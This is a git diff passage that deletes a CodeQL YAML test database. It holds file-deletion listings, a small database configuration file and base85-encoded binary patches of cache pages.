ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImplCommon#f7de413b--MakeImplCommon-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Cached--TAccessPathFront-12309985 delete mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImplCommon#f7de413b--MakeImplCommon-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Cached--TAccessPathFront-12309985#0# delete mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImplCommon#f7de413b--MakeImplCommon-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Cached--TAccessPathFrontOp-ea156098 delete mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImplCommon#f7de413b--MakeImplCommon-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Cached--TAccessPathFrontOp-ea156098#0# delete mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImplCommon#f7de413b--MakeImplCommon-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Cached--TAccessPathFrontOp-ea156098#1#t delete mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImplCommon#f7de413b--MakeImplCommon-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Cached--TApproxAccessPathF-0bf03857 delete mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImplCommon#f7de413b--MakeImplCommon-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Cached--TApproxAccessPathF-0bf03857#0# delete mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImplCommon#f7de413b--MakeImplCommon-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Cached--TApproxAccessPathF-0bf03857#1#t delete mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImplCommon#f7de413b--MakeImplCommon-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Cached--TApproxAccessPathF-baba9c49 delete mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImplCommon#f7de413b--MakeImplCommon-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Cached--TApproxAccessPathF-baba9c49#0# delete mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImplCommon#f7de413b--MakeImplCommon-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Cached--TBooleanOption-dec0af22 delete mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImplCommon#f7de413b--MakeImplCommon-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Cached--TBooleanOption-dec0af22#0# delete mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImplCommon#f7de413b--MakeImplCommon-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Cached--TBooleanOption-dec0af22#1#b delete mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImplCommon#f7de413b--MakeImplCommon-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Cached--TCallContext-54d858e5 delete mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImplCommon#f7de413b--MakeImplCommon-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Cached--TCallContext-54d858e5#0# delete mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImplCommon#f7de413b--MakeImplCommon-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Cached--TCallContext-54d858e5#2# delete mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImplCommon#f7de413b--MakeImplCommon-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Cached--TDataFlowCallOptio-c18bdb95 delete mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImplCommon#f7de413b--MakeImplCommon-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Cached--TDataFlowCallOptio-c18bdb95#0# delete mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImplCommon#f7de413b--MakeImplCommon-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Cached--TDataFlowCallOptio-c18bdb95#1#t delete mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImplCommon#f7de413b--MakeImplCommon-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Cached--TLocalFlowCallCont-17f4a8f6 delete mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImplCommon#f7de413b--MakeImplCommon-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Cached--TLocalFlowCallCont-17f4a8f6#0# delete mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImplCommon#f7de413b--MakeImplCommon-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Cached--TParamNodeOption-178d6b8b delete mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImplCommon#f7de413b--MakeImplCommon-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Cached--TParamNodeOption-178d6b8b#0# delete mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImplCommon#f7de413b--MakeImplCommon-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Cached--TReturnCtx-f40235df delete mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImplCommon#f7de413b--MakeImplCommon-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Cached--TReturnCtx-f40235df#0# delete mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImplCommon#f7de413b--MakeImplCommon-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Cached--TReturnCtx-f40235df#1# delete mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImplCommon#f7de413b--MakeImplCommon-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Cached--TReturnKindExt-9770a119 delete mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImplCommon#f7de413b--MakeImplCommon-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Cached--TReturnKindExt-9770a119#0#t delete mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowPrivate#6a54d7ad--TDataFlowType delete mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowPrivate#6a54d7ad--TDataFlowType#0# delete mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowPrivate#6a54d7ad--TNode delete mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowPrivate#6a54d7ad--TNode#0#t delete mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowPrivate#6a54d7ad--TReturnKind delete mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowPrivate#6a54d7ad--TReturnKind#0# delete mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#Option#8eb11f23--Option-DataFlowPrivate#6a54d7ad--DataFlowType---TOption-4fb642c9 delete mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#Option#8eb11f23--Option-DataFlowPrivate#6a54d7ad--DataFlowType---TOption-4fb642c9#0# delete mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#Option#8eb11f23--Option-Unit#54592529--Unit---TOption-51176e26 delete mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#Option#8eb11f23--Option-Unit#54592529--Unit---TOption-51176e26#0# delete mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#Unit#54592529--TUnit delete mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#Unit#54592529--TUnit#0# delete mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#printAst#38acf19d--TPrintNode delete mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#printAst#38acf19d--TPrintNode#0#e delete mode 100644 ql/src/test-db/db-yaml/default/cache/pages/02.pack delete mode 100644 ql/src/test-db/db-yaml/default/cache/pages/04.pack delete mode 100644 ql/src/test-db/db-yaml/default/cache/pages/1f.pack delete mode 100644 ql/src/test-db/db-yaml/default/cache/pages/29.pack delete mode 100644 ql/src/test-db/db-yaml/default/cache/pages/2b.pack delete mode 100644 ql/src/test-db/db-yaml/default/cache/pages/2d.pack delete mode 100644 ql/src/test-db/db-yaml/default/cache/pages/2e.pack delete mode 100644 ql/src/test-db/db-yaml/default/cache/pages/2e.pack.d delete mode 100644 ql/src/test-db/db-yaml/default/cache/pages/32.pack delete mode 100644 ql/src/test-db/db-yaml/default/cache/pages/46.pack delete mode 100644 ql/src/test-db/db-yaml/default/cache/pages/4b.pack delete mode 100644 ql/src/test-db/db-yaml/default/cache/pages/4b.pack.d delete mode 100644 ql/src/test-db/db-yaml/default/cache/pages/67.pack delete mode 100644 ql/src/test-db/db-yaml/default/cache/pages/67.pack.d delete mode 100644 ql/src/test-db/db-yaml/default/cache/pages/71.pack delete mode 100644 ql/src/test-db/db-yaml/default/cache/pages/71.pack.d delete mode 100644 ql/src/test-db/db-yaml/default/cache/pages/82.pack delete mode 100644 ql/src/test-db/db-yaml/default/cache/pages/82.pack.d delete mode 100644 ql/src/test-db/db-yaml/default/cache/pages/91.pack delete mode 100644 ql/src/test-db/db-yaml/default/cache/pages/92.pack delete mode 100644 ql/src/test-db/db-yaml/default/cache/pages/92.pack.d delete mode 100644 ql/src/test-db/db-yaml/default/cache/pages/95.pack delete mode 100644 ql/src/test-db/db-yaml/default/cache/pages/99.pack delete mode 100644 ql/src/test-db/db-yaml/default/cache/pages/99.pack.d delete mode 100644 ql/src/test-db/db-yaml/default/cache/pages/a3.pack delete mode 100644 ql/src/test-db/db-yaml/default/cache/pages/a3.pack.d delete mode 100644 ql/src/test-db/db-yaml/default/cache/pages/a4.pack delete mode 100644 ql/src/test-db/db-yaml/default/cache/pages/ab.pack delete mode 100644 ql/src/test-db/db-yaml/default/cache/pages/b6.pack delete mode 100644 ql/src/test-db/db-yaml/default/cache/pages/b6.pack.d delete mode 100644 ql/src/test-db/db-yaml/default/cache/pages/bd.pack delete mode 100644 ql/src/test-db/db-yaml/default/cache/pages/ce.pack delete mode 100644 ql/src/test-db/db-yaml/default/cache/pages/d0.pack delete mode 100644 ql/src/test-db/db-yaml/default/cache/pages/de.pack delete mode 100644 ql/src/test-db/db-yaml/default/cache/pages/de.pack.d delete mode 100644 ql/src/test-db/db-yaml/default/cache/pages/df.pack delete mode 100644 ql/src/test-db/db-yaml/default/cache/pages/e4.pack delete mode 100644 ql/src/test-db/db-yaml/default/cache/pages/e6.pack delete mode 100644 ql/src/test-db/db-yaml/default/cache/pages/fc.pack delete mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/01.pack delete mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/03.pack delete mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/06.pack delete mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/09.pack delete mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/10.pack delete mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/1f.pack delete mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/20.pack delete mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/24.pack delete mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/25.pack delete mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/26.pack delete mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/28.pack delete mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/2a.pack delete mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/2d.pack delete mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/2e.pack delete mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/2f.pack delete mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/32.pack delete mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/36.pack delete mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/3c.pack delete mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/43.pack delete mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/45.pack delete mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/57.pack delete mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/59.pack delete mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/5a.pack delete mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/5b.pack delete mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/5d.pack delete mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/60.pack delete mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/66.pack delete mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/6c.pack delete mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/6f.pack delete mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/74.pack delete mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/75.pack delete mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/78.pack delete mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/7b.pack delete mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/7e.pack delete mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/83.pack delete mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/86.pack delete mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/8d.pack delete mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/96.pack delete mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/98.pack delete mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/99.pack delete mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/9f.pack delete mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/a0.pack delete mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/a8.pack delete mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/a9.pack delete mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/bd.pack delete mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/bf.pack delete mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/c5.pack delete mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/c9.pack delete mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/ca.pack delete mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/d2.pack delete mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/d5.pack delete mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/dc.pack delete mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/de.pack delete mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/df.pack delete mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/e0.pack delete mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/e4.pack delete mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/ef.pack delete mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/f8.pack delete mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/f9.pack delete mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/ff.pack delete mode 100644 ql/src/test-db/db-yaml/default/cache/relations/07.pack delete mode 100644 ql/src/test-db/db-yaml/default/cache/relations/0d.pack delete mode 100644 ql/src/test-db/db-yaml/default/cache/relations/0e.pack delete mode 100644 ql/src/test-db/db-yaml/default/cache/relations/10.pack delete mode 100644 ql/src/test-db/db-yaml/default/cache/relations/14.pack delete mode 100644 ql/src/test-db/db-yaml/default/cache/relations/18.pack delete mode 100644 ql/src/test-db/db-yaml/default/cache/relations/19.pack delete mode 100644 ql/src/test-db/db-yaml/default/cache/relations/1b.pack delete mode 100644 ql/src/test-db/db-yaml/default/cache/relations/1e.pack delete mode 100644 ql/src/test-db/db-yaml/default/cache/relations/28.pack delete mode 100644 ql/src/test-db/db-yaml/default/cache/relations/2f.pack delete mode 100644 ql/src/test-db/db-yaml/default/cache/relations/39.pack delete mode 100644 ql/src/test-db/db-yaml/default/cache/relations/47.pack delete mode 100644 ql/src/test-db/db-yaml/default/cache/relations/4d.pack delete mode 100644 ql/src/test-db/db-yaml/default/cache/relations/52.pack delete mode 100644 ql/src/test-db/db-yaml/default/cache/relations/56.pack delete mode 100644 ql/src/test-db/db-yaml/default/cache/relations/59.pack delete mode 100644 ql/src/test-db/db-yaml/default/cache/relations/5b.pack delete mode 100644 ql/src/test-db/db-yaml/default/cache/relations/5d.pack delete mode 100644 ql/src/test-db/db-yaml/default/cache/relations/6a.pack delete mode 100644 ql/src/test-db/db-yaml/default/cache/relations/80.pack delete mode 100644 ql/src/test-db/db-yaml/default/cache/relations/85.pack delete mode 100644 ql/src/test-db/db-yaml/default/cache/relations/8b.pack delete mode 100644 ql/src/test-db/db-yaml/default/cache/relations/aa.pack delete mode 100644 ql/src/test-db/db-yaml/default/cache/relations/ac.pack delete mode 100644 ql/src/test-db/db-yaml/default/cache/relations/c1.pack delete mode 100644 ql/src/test-db/db-yaml/default/cache/relations/ca.pack delete mode 100644 ql/src/test-db/db-yaml/default/cache/relations/cc.pack delete mode 100644 ql/src/test-db/db-yaml/default/cache/relations/d0.pack delete mode 100644 ql/src/test-db/db-yaml/default/cache/relations/d5.pack delete mode 100644 ql/src/test-db/db-yaml/default/cache/relations/da.pack delete mode 100644 ql/src/test-db/db-yaml/default/cache/version delete mode 100644 ql/src/test-db/db-yaml/default/containerparent.rel delete mode 100644 ql/src/test-db/db-yaml/default/containerparent.rel.checksum delete mode 100644 ql/src/test-db/db-yaml/default/files.rel delete mode 100644 ql/src/test-db/db-yaml/default/files.rel.checksum delete mode 100644 ql/src/test-db/db-yaml/default/folders.rel delete mode 100644 ql/src/test-db/db-yaml/default/folders.rel.checksum delete mode 100644 ql/src/test-db/db-yaml/default/locations_default.rel delete mode 100644 ql/src/test-db/db-yaml/default/locations_default.rel.checksum delete mode 100644 ql/src/test-db/db-yaml/default/pools/0/buckets/info delete mode 100644 ql/src/test-db/db-yaml/default/pools/0/buckets/page-000000 delete mode 100644 ql/src/test-db/db-yaml/default/pools/0/info delete mode 100644 ql/src/test-db/db-yaml/default/pools/0/metadata/info delete mode 100644 ql/src/test-db/db-yaml/default/pools/0/metadata/page-000000 delete mode 100644 ql/src/test-db/db-yaml/default/pools/0/pageDump/page-000000000 delete mode 100644 ql/src/test-db/db-yaml/default/pools/1/buckets/info delete mode 100644 ql/src/test-db/db-yaml/default/pools/1/buckets/page-000000 delete mode 100644 ql/src/test-db/db-yaml/default/pools/1/ids1/info delete mode 100644 ql/src/test-db/db-yaml/default/pools/1/ids1/page-000000 delete mode 100644 ql/src/test-db/db-yaml/default/pools/1/indices1/info delete mode 100644 ql/src/test-db/db-yaml/default/pools/1/indices1/page-000000 delete mode 100644 ql/src/test-db/db-yaml/default/pools/1/info delete mode 100644 ql/src/test-db/db-yaml/default/pools/1/metadata/info delete mode 100644 ql/src/test-db/db-yaml/default/pools/1/metadata/page-000000 delete mode 100644 ql/src/test-db/db-yaml/default/pools/1/pageDump/page-000000000 delete mode 100644 ql/src/test-db/db-yaml/default/pools/poolInfo delete mode 100644 ql/src/test-db/db-yaml/default/sourceLocationPrefix.rel delete mode 100644 ql/src/test-db/db-yaml/default/sourceLocationPrefix.rel.checksum delete mode 100644 ql/src/test-db/db-yaml/default/strings/0/buckets/page-000000 delete mode 100644 ql/src/test-db/db-yaml/default/strings/0/metadata/page-000000 delete mode 100644 ql/src/test-db/db-yaml/default/strings/0/pageDump/page-000000000 delete mode 100644 ql/src/test-db/db-yaml/default/yaml.rel delete mode 100644 ql/src/test-db/db-yaml/default/yaml.rel.checksum delete mode 100644 ql/src/test-db/db-yaml/default/yaml_locations.rel delete mode 100644 ql/src/test-db/db-yaml/default/yaml_locations.rel.checksum delete mode 100644 ql/src/test-db/db-yaml/default/yaml_scalars.rel delete mode 100644 ql/src/test-db/db-yaml/default/yaml_scalars.rel.checksum delete mode 100755 ql/src/test-db/db-yaml/yaml.dbscheme delete mode 100644 ql/src/test-db/diagnostic/cli-diagnostics-add-20240203T091753.298Z.json delete mode 100644 ql/src/test-db/diagnostic/cli-diagnostics-add-20240203T091754.191Z.json delete mode 100644 ql/src/test-db/log/database-create-20240203.101751.644.log delete mode 100644 ql/src/test-db/log/database-index-files-20240203.101752.962.log delete mode 100644 ql/src/test-db/src.zip diff --git a/ql/lib/test-db/baseline-info.json b/ql/lib/test-db/baseline-info.json deleted file mode 100644 index 9e26dfeeb6e6..000000000000 --- a/ql/lib/test-db/baseline-info.json +++ /dev/null @@ -1 +0,0 @@ -{} \ No newline at end of file diff --git a/ql/lib/test-db/codeql-database.yml b/ql/lib/test-db/codeql-database.yml deleted file mode 100644 index 887a8daf4c13..000000000000 --- a/ql/lib/test-db/codeql-database.yml +++ /dev/null @@ -1,10 +0,0 @@ ---- -sourceLocationPrefix: /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test -baselineLinesOfCode: 0 -unicodeNewlines: false -columnKind: utf16 -primaryLanguage: yaml -creationMetadata: - cliVersion: 2.16.1 - creationTime: 2024-02-03T09:17:54.858204Z -finalised: true diff --git a/ql/lib/test-db/db-yaml/default/cache/.lock b/ql/lib/test-db/db-yaml/default/cache/.lock deleted file mode 100644 index e69de29bb2d1..000000000000 diff --git a/ql/lib/test-db/db-yaml/default/cache/cached-strings/pools/0/buckets/info b/ql/lib/test-db/db-yaml/default/cache/cached-strings/pools/0/buckets/info deleted file mode 100644 index 0111728636533e2c31d7b0489e64f46bcd4d6cf2..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 40 ecmZQz00Tw{#Q>$5|AY89zRa8gqUTSZdItbEj0T|q diff --git a/ql/lib/test-db/db-yaml/default/cache/cached-strings/pools/0/buckets/page-000000 b/ql/lib/test-db/db-yaml/default/cache/cached-strings/pools/0/buckets/page-000000 deleted file mode 100644 index 6d17cf9d15fb9f4a2358a2d079f3b8c755d005fa..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 8192 zcmeIu0Sy2E0K%a6Pi+o2h(KY$fB^#r3>YwAz<>b*1`HT5V8DO@0|pEjFkrxd0RsjM GyblZ@00031 diff --git a/ql/lib/test-db/db-yaml/default/cache/cached-strings/pools/0/ids1/info b/ql/lib/test-db/db-yaml/default/cache/cached-strings/pools/0/ids1/info deleted file mode 100644 index 799471fd4d54d409c98d3b7826deaac67913dc99..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 40 ecmZQz00Tw{#Q>!l|AY89zRa8gqGzYMJ_GYwAz<>b*1`HT5V8DO@0|pEjFkrxd0RsjM GyblZ@00031 diff --git a/ql/lib/test-db/db-yaml/default/cache/cached-strings/pools/0/indices1/info b/ql/lib/test-db/db-yaml/default/cache/cached-strings/pools/0/indices1/info deleted file mode 100644 index 799471fd4d54d409c98d3b7826deaac67913dc99..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 40 ecmZQz00Tw{#Q>!l|AY89zRa8gqGzYMJ_GYwAz<>b*1`HT5V8DO@0|pEjFkrxd0RsjM GyblZ@00031 diff --git a/ql/lib/test-db/db-yaml/default/cache/cached-strings/pools/0/info b/ql/lib/test-db/db-yaml/default/cache/cached-strings/pools/0/info deleted file mode 100644 index 9c1ea6cdeb296b714876d0e928d9978e9ec788c9..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 41 ZcmZQz00U+S1tA%s91sm=%ij{e1^@)e0qp<) diff --git a/ql/lib/test-db/db-yaml/default/cache/cached-strings/pools/0/metadata/info b/ql/lib/test-db/db-yaml/default/cache/cached-strings/pools/0/metadata/info deleted file mode 100644 index 9cdb710dfd9490f67f5103cbab69eb12829f96b4..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 40 ecmZQz00Tw{#lZL<3PAiDUuI4L(W_e5uLA(d%ME}4 diff --git a/ql/lib/test-db/db-yaml/default/cache/cached-strings/pools/0/metadata/page-000000 b/ql/lib/test-db/db-yaml/default/cache/cached-strings/pools/0/metadata/page-000000 deleted file mode 100644 index 6d17cf9d15fb9f4a2358a2d079f3b8c755d005fa..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 8192 zcmeIu0Sy2E0K%a6Pi+o2h(KY$fB^#r3>YwAz<>b*1`HT5V8DO@0|pEjFkrxd0RsjM GyblZ@00031 diff --git a/ql/lib/test-db/db-yaml/default/cache/cached-strings/pools/0/pageDump/page-000000000 b/ql/lib/test-db/db-yaml/default/cache/cached-strings/pools/0/pageDump/page-000000000 deleted file mode 100644 index 7bccaeb20c898fd660036bab54ae98c20280d0a3..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 1048592 zcmeIuF%bYT48*X95C8>I#^n|iy>Q4V1Mr|k1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U zAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C7 z2oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N z0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U zAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C7 z2oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N z0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U zAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C7 z2oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N z0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U zAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C7 